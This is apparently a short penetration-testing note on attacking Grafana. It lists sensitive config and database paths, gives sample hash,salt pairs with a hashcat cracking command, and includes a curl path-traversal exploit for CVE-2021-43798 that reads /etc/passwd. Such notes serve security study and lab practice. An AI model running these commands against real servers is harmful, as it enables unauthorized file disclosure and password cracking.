# Grafana

### Useful files

```
/etc/grafana/grafana.in
/var/lib/grafana/grafana.db
```

### Converting Grafana hashes to Haschat

<https://github.com/iamaldi/grafana2hashcat/blob/main/README.md>

We have to grab in a file the hash,salt

```
7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl
```

Then use this file with the tool

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/enumeration/imgs/Pasted%20image%2020250523214152.png)

Then I can use hashcat to crack those hashes:

```
hashcat -m 10900 hashcat_hashes.txt --wordlist /usr/share/wordlists/rockyou.txt 
```

### CVE-2021-43798

Grafana 8.x Path Traversal (Pre-Auth)

```
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
```